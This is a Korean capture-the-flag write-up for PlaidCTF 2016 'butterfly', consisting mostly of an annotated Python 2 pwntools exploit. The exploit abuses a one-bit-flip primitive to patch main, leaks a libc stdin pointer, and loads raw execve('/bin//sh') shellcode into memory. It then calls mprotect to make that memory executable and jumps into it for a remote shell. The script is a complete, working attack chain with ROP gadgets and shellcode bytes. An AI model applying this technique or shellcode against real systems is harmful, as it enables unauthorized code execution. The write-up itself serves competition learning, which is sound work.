PlaidCTF 2016 butterfly

Games/CTF 2016. 4. 19. 19:49

1bit flip을 하게 해주는 문제.

main 함수의 명령어 몇 개를 바꿔서 ROP 하면 됨.

hahah 님의 빠른 풀이전략을 듣고 익스코드 작성.



from pwn import *

import time

# CTF writeup exploit script (PlaidCTF 2016 "butterfly"), written for
# Python 2 and the pwntools API of that era: the `print` statements,
# raw_input() and str.encode('hex') below do not run unmodified on Python 3.
# Every address in this file is hard-coded for one specific build of the
# challenge binary (presumably non-PIE, since nothing is rebased — confirm),
# and nothing here verifies that the remote side actually matches.
context.arch = 'amd64' # i386 / arm
# With arch set to amd64, pwntools' pack() emits 8-byte little-endian words,
# which every ROP-chain entry below relies on.


# 30 bytes of raw x86-64 machine code; the byte run 2F 62 69 6E 2F 2F 73 68
# spells "/bin//sh". It is not executed by this script, only sent verbatim
# as input at the fgets stage further down.
SH = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

# recvuntil sendline, pack, recv, send

# Remote target. The commented-out process() line is the local variant
# (stdbuf with zero-size buffers so prompts arrive immediately).
r = remote('butterfly.pwning.xxx', 9999)

#r = process(['stdbuf', '-o', '0', '-i', '0', './butterfly'])

# Pause so a debugger can be attached before any input is sent; against the
# remote service this just waits for Enter.
raw_input('attach')

# start pwn.


# Each round below sends the same shape of message: a decimal string padded
# to 40 bytes, followed by one or more packed 8-byte addresses. The post
# describes the service as allowing a single bit flip per round; presumably
# the decimal selects the bit to flip and the trailing packed address is
# where the program returns afterwards (main, to get another round) —
# confirm against the binary. The author's comments name the intended
# effect of each flip.
# 0x48 -> 0x08

main = 0x400788

TARGET1 = '33571614'.ljust(40, ' ') #33571608 + ?

TARGET1 += pack(main)

# Python 2 print statement: shows (and consumes) whatever the service has
# produced so far. recv(1000) returns what is currently available, which is
# not guaranteed to be the complete prompt.
print r.recv(1000)


r.sendline(TARGET1)


# create rdx gadget

TARGET22 = '33571616'.ljust(40, ' ')

TARGET22 += pack(main)

print r.recv(1000)

r.sendline(TARGET22)


# change fgets size

TARGET2 = '33570343'.ljust(40, ' ')

TARGET2 += pack(main)


print r.recv(1000)


r.sendline(TARGET2)


# jne -> je

TARGET32 = '33571544'.ljust(40, ' ')

# The bare string below is the author's scratch note (gadget disassembly);
# it is an expression statement with no runtime effect. Note that the
# addresses listed in it differ from the poprsi/poprdx values used later.
'''

pattern 5fc3 found at 0x4008f3

POP RDI; RET;


   0x4007c8 <main+208>: pop    %rsi

   0x4007c9 <main+209>: pop    %r15

   0x4007cb <main+211>: pop    %rbp

   0x4007cc <main+212>: retq  


   0x00000000004007c6 <+206>: pop    %rdx

   0x00000000004007c7 <+207>: pop    %r14

   0x00000000004007c9 <+209>: pop    %r15

   0x00000000004007cb <+211>: pop    %rbp

   0x00000000004007cc <+212>: retq 

'''


# Fixed addresses for this build: PLT entries, the GOT slot read for the
# leak, and the three register-loading gadgets used by the chains below.
fgets = 0x400640

puts = 0x400600

stdin_got = 0x600d30

poprdi = 0x4008f3

poprsi = 0x400866

poprdx = 0x400864

mprotect = 0x400660


raw_input('4')

# start full ROP. fgets

# Chain: puts(stdin_got) to print the resolved stdin pointer, then back to
# main for another round.
TARGET32 += pack(poprdi)

TARGET32 += pack(stdin_got)

TARGET32 += pack(puts)

TARGET32 += pack(main)

print r.recv(1000)

raw_input()

r.sendline(TARGET32)

raw_input()

leak = r.recv(1000)

print leak

# Parse the leaked pointer: second line of the reply, bytes reversed
# (little-endian on the wire -> big-endian for int()), hex-encoded, then
# converted. Fragile: if recv(1000) returned fewer than two lines this
# raises IndexError, and any extra bytes on that line are folded into the
# value with no sanity check.
stdin = int(leak.split('\n')[1][::-1].encode('hex'), 16)

print 'stdin : {0}'.format(hex(stdin))


# Padded with '#' here rather than ' ' as in the earlier rounds; the script
# does not say why — presumably any non-digit filler is accepted.
TARGET3 = '33571864'.ljust(40, '#')


# Chain: fgets(0x600800, 0x80, stdin), then back to main. The two filler
# words after poprsi and the three after poprdx match the extra pops in the
# gadget sequences sketched in the note above (pop rsi; pop r15; pop rbp
# and pop rdx; pop r14; pop r15; pop rbp); since the gadget addresses used
# here differ from that note, the counts are the author's, not verified.
TARGET3 += pack(poprdi)

TARGET3 += pack(0x600800) # shellcode location

TARGET3 += pack(poprsi)

TARGET3 += pack(0x80)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(poprdx)

TARGET3 += pack(stdin)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(fgets)

TARGET3 += pack(main)

r.sendline(TARGET3)

# Timing-based synchronisation: assumes the chain has reached fgets within
# a second. Nothing is read back to confirm before SH is sent.
time.sleep(1)

r.sendline(SH)

time.sleep(.5)

print r.recv(1000)

time.sleep(.5)



TARGET4 = '33571864'.ljust(40, '#')

# Chain: mprotect(0x600000, 0x1000, 7) — 7 is PROT_READ|PROT_WRITE|PROT_EXEC —
# and then, instead of returning to main, fall into 0x600800 where the
# previous round stored SH. Same filler-word layout as TARGET3.
TARGET4 += pack(poprdi)

TARGET4 += pack(0x600000)

TARGET4 += pack(poprsi)

TARGET4 += pack(0x1000)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(poprdx)

TARGET4 += pack(7)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(mprotect)

TARGET4 += pack(0x600800) # jump to shellcode

r.sendline(TARGET4)


# get shell?

# Hand the connection over to the terminal.
r.interactive()

